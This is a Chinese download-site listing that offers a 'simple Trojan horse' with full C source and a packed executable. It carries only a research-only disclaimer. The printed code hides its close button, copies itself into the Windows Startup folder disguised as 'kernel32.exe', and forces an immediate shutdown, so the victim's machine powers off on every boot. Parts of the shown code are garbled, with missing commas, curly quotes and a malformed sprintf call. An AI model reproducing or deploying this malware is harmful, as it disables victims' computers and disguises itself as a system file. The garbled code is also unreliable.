资源简介

简易特洛伊木马程序,Windows Defender安全中心(Win10)警报级别:严重。包含源码和程序。采用C/C++编写,仅供研究。本程序不具备传染性!使用前,请三思,所造成之后果,本人不负任何责任,感谢。

资源截图

代码片段和文件信息

#define _WIN32_WINNT 0x0500
#include 
#include 
#include 
int main(int argcchar *argv[])
{
DeleteMenu(GetSystemMenu(GetConsoleWindow() FALSE) SC_CLOSE MF_BYCOMMAND);
DrawMenuBar(GetConsoleWindow());
char path[128];
    char exe[512];
    char run[512];
    char copy[512];
    sprintf(copy“copy %s D:\\“argv[0]);
    system(copy);
    OSVERSIONINFO os;//操作系统版本
    os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&os);
    
    GetSystemDirectory(path 128);//获取系统路径
    GetModuleFileName(NULL exe 512);//获取自身路径
    
    if(os.dwPlatformId == VER_PLATFORM_WIN32_NT && os.dwMajorVersion == 5 && os.dwMinorVersion == 1)//WIN XP
sprintf(run “%c%c\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\kernel32.exe“ path[0] path[1]);
    else
sprintf(run “%c%c\\Documents and Settings\\All Users\\「开始」菜单\\程序\\Startup\\kernel32.exe“ path[0] path[1]);
    CopyFile(exe run FALSE);//复制文件
    sprintf(exe“D:\\%s“);
    CopyFile(exe run FALSE);//复制文件
    system(“shutdown /s /t 2“);
return 1;
}

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----
     文件        1133  2016-05-10 21:38  Hamster病毒试验品3号.c
     文件       22999  2016-05-10 21:39  Hamster病毒试验品3号加壳版.exe

评论

共有 条评论